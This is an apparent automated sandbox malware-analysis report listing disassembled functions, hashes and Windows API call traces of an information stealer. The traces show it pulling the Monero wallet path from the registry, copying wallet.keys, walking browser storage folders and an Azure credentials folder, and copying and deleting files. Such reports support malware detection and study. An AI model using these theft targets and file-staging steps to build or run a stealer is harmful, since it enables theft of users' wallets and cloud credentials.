                              • Instruction ID: ebfce5b23c9384b45e6a44d147e3a14dd3e95e372dbf2033ef430efe3c36b45f
                              • Opcode Fuzzy Hash: 5b4daad53d942201a209afb87794fa314599dfaad260d82dfcc24108f0fc8569
                              • Instruction Fuzzy Hash: 5941BFF291C7149FE7107F28EC857BABBE8EB55310F06492DEAD483300E63598448B97
                              Function 00C4649D Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cde3c291be77081cafe0a62c8ddd8430af9f7cfd72433f5882c0bf1515c3cf98
                              • Instruction ID: 488a0b5213f8d82ed124c85e33fde4fccc6e8be291b7a0d8dc339c558fb7cc53
                              • Opcode Fuzzy Hash: cde3c291be77081cafe0a62c8ddd8430af9f7cfd72433f5882c0bf1515c3cf98
                              • Instruction Fuzzy Hash: 422127B391C310AFE308BA19DC416BFB7E5EF84360F16892EEAC583B50D635580087D6
                              Function 007C85B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C8636
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C866D
                              • lstrcpy.KERNEL32(?,00000000), ref: 007C86AA
                              • StrStrA.SHLWAPI(?,0145D918), ref: 007C86CF
                              • lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C86EE
                              • lstrlen.KERNEL32(?), ref: 007C8701
                              • wsprintfA.USER32 ref: 007C8711
                              • lstrcpy.KERNEL32(?,?), ref: 007C8727
                              • StrStrA.SHLWAPI(?,0145DC00), ref: 007C8754
                              • lstrcpy.KERNEL32(?,009E93D0), ref: 007C87B4
                              • StrStrA.SHLWAPI(?,0145DCF0), ref: 007C87E1
                              • lstrcpyn.KERNEL32(009E93D0,?,00000000), ref: 007C8800
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                              • String ID: %s%s
                              • API String ID: 2672039231-3252725368
                              • Opcode ID: e9f444700de0c5f3162826ec6cf799e61615eb061a68d1048e89fa4b66c5ca3d
                              • Instruction ID: 1cb4e36db457dbc98031fed540e83d72303302eb0d360d68656cf7d4cf5fcdb2
                              • Opcode Fuzzy Hash: e9f444700de0c5f3162826ec6cf799e61615eb061a68d1048e89fa4b66c5ca3d
                              • Instruction Fuzzy Hash: 22F19E71919154EFCB10DBA4DD88ADBB7B9EF88300F108599F90AE7351DB34AE01DBA1
                              Function 007B1F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B1F9F
                              • lstrlen.KERNEL32(01458B08), ref: 007B1FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 007B1FE3
                              • lstrlen.KERNEL32(007E1794), ref: 007B1FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B200E
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B2042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B204D
                              • lstrlen.KERNEL32(007E1794), ref: 007B2058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2075
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2081
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B20AC
                              • lstrlen.KERNEL32(?), ref: 007B20E4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2104
                              • lstrcat.KERNEL32(00000000,?), ref: 007B2112
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2139
                              • lstrlen.KERNEL32(007E1794), ref: 007B214B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B216B
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007B2177
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B219D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B21A8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B21D4
                              • lstrlen.KERNEL32(?), ref: 007B21EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B220A
                              • lstrcat.KERNEL32(00000000,?), ref: 007B2218
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2242
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B227F
                              • lstrlen.KERNEL32(0145CF08), ref: 007B228D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B22B1
                              • lstrcat.KERNEL32(00000000,0145CF08), ref: 007B22B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B22F7
                              • lstrcat.KERNEL32(00000000), ref: 007B2304
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B232D
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 007B2356
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B2382
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B23BF
                              • DeleteFileA.KERNEL32(00000000), ref: 007B23F7
                              • FindNextFileA.KERNEL32(00000000,?), ref: 007B2444
                              • FindClose.KERNEL32(00000000), ref: 007B2453
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                              • String ID:
                              • API String ID: 2857443207-0
                              • Opcode ID: 764ed1c42ad19b5a248fbd337f311c1e7becaac81eb220ffa0f3bef44fe28893
                              • Instruction ID: e532bc3a63c0a030ac0fa23a98e0c0e19713f5e3d145d0d0deb750b32f8bf307
                              • Opcode Fuzzy Hash: 764ed1c42ad19b5a248fbd337f311c1e7becaac81eb220ffa0f3bef44fe28893
                              • Instruction Fuzzy Hash: 7AE13071A2625ADBDB21EF64DD89BEE77B9AF44300F044464F805BB212DB38DD46CB90
                              Function 007C6410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6445
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C6480
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007C64AA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C64E1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6506
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C650E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C6537
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID: \..\
                              • API String ID: 2938889746-4220915743
                              • Opcode ID: fb15879922aa93f694f02c9f4cb35bf5d6e0d6c2bc4958cc1c78352900e6df44
                              • Instruction ID: a1dbc8f5d6f0521abb5e37601b74ce9df5aadecbf3d84f3aefe9a06f198f8a6b
                              • Opcode Fuzzy Hash: fb15879922aa93f694f02c9f4cb35bf5d6e0d6c2bc4958cc1c78352900e6df44
                              • Instruction Fuzzy Hash: 31F19F719162469BDB21EF68D889FAE77B9AF44300F14852CF845EB252DB3CDD42CB90
                              Function 007C4370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C43A3
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C43D6
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C43FE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4409
                              • lstrlen.KERNEL32(\storage\default\), ref: 007C4414
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4431
                              • lstrcat.KERNEL32(00000000,\storage\default\), ref: 007C443D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4466
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4471
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4498
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C44D7
                              • lstrcat.KERNEL32(00000000,?), ref: 007C44DF
                              • lstrlen.KERNEL32(007E1794), ref: 007C44EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4507
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C4513
                              • lstrlen.KERNEL32(.metadata-v2), ref: 007C451E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C453B
                              • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 007C4547
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C456E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C45A0
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007C45A7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4601
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C462A
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C4653
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C467B
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C46AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                              • String ID: .metadata-v2$\storage\default\
                              • API String ID: 1033685851-762053450
                              • Opcode ID: 0a90231189bb881ced6b262bb0f429375f192ef3a2de0d09902055771d0751bb
                              • Instruction ID: 50816863a8d14c66f76840dbdf5079a5de2e405d22d3cfc28e25a19d4381a7f2
                              • Opcode Fuzzy Hash: 0a90231189bb881ced6b262bb0f429375f192ef3a2de0d09902055771d0751bb
                              • Instruction Fuzzy Hash: C5B17F71A162469BDB21EF78DD99FAE77B9AF04300F14412CB845F7252DB38ED028B90
                              Function 007C57A0 Relevance: 45.5, APIs: 30, Instructions: 486stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C57D5
                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007C5804
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C585D
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5868
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5890
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C58C8
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C58D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C58F8
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C592E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5956
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5961
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5988
                              • lstrlen.KERNEL32(007E1794), ref: 007C599A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C59B9
                              • lstrcat.KERNEL32(00000000,007E1794), ref: 007C59C5
                              • lstrlen.KERNEL32(0145CED8), ref: 007C59D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C59F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C5A02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5A2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5A58
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007C5A5F
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5AB7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B2D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B56
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5B89
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5BB5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C5BEF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007C5C4C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C5C70
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 2428362635-0
                              • Opcode ID: a8881f14d3888b3caef2327f026264923221050bcba98723390191c5ba77274d
                              • Instruction ID: 03e8c40ef2b29116b503f8e9a7241835789c1a4be04e90a337aaf98513ec3abe
                              • Opcode Fuzzy Hash: a8881f14d3888b3caef2327f026264923221050bcba98723390191c5ba77274d
                              • Instruction Fuzzy Hash: 3E028171A15646DBCB21EF68D889FEE7BB5AF44300F44412CF805A7252DB39ED86CB90
                              Function 007B1190 Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 280stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007B1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B1135
                                • Part of subcall function 007B1120: RtlAllocateHeap.NTDLL(00000000), ref: 007B113C
                                • Part of subcall function 007B1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007B1159
                                • Part of subcall function 007B1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007B1173
                                • Part of subcall function 007B1120: RegCloseKey.ADVAPI32(?), ref: 007B117D
                              • lstrcat.KERNEL32(?,00000000), ref: 007B11C0
                              • lstrlen.KERNEL32(?), ref: 007B11CD
                              • lstrcat.KERNEL32(?,.keys), ref: 007B11E8
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B121F
                              • lstrlen.KERNEL32(01458B08), ref: 007B122D
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1251
                              • lstrcat.KERNEL32(00000000,01458B08), ref: 007B1259
                              • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 007B1264
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1288
                              • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 007B1294
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B12BA
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B12FF
                              • lstrlen.KERNEL32(0145CF08), ref: 007B130E
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1335
                              • lstrcat.KERNEL32(00000000,?), ref: 007B133D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B1378
                              • lstrcat.KERNEL32(00000000), ref: 007B1385
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B13AC
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 007B13D5
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B1401
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B143D
                                • Part of subcall function 007CEDE0: lstrcpy.KERNEL32(00000000,?), ref: 007CEE12
                              • DeleteFileA.KERNEL32(?), ref: 007B1471
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                              • String ID: .keys$\Monero\wallet.keys
                              • API String ID: 2881711868-3586502688
                              • Opcode ID: f64f4d60d100d9c744a1e27c410a2e89c204636dcd5a86918bcdb2fc0539b70a
                              • Instruction ID: c4aa9a68a4563a0e44f7cdfcf6ed904c1cd498087f2fe647a92c5b1041b09fe8
                              • Opcode Fuzzy Hash: f64f4d60d100d9c744a1e27c410a2e89c204636dcd5a86918bcdb2fc0539b70a
                              • Instruction Fuzzy Hash: E9A15C71A162069BDB21EFB4DC99BEE77B9AF44300F844524F905F7252DB38ED028B90
                              Function 007CE720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 007CE740
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 007CE769
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE79F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE7AD
                              • lstrcat.KERNEL32(?,\.azure\), ref: 007CE7C6
                              • memset.MSVCRT ref: 007CE805
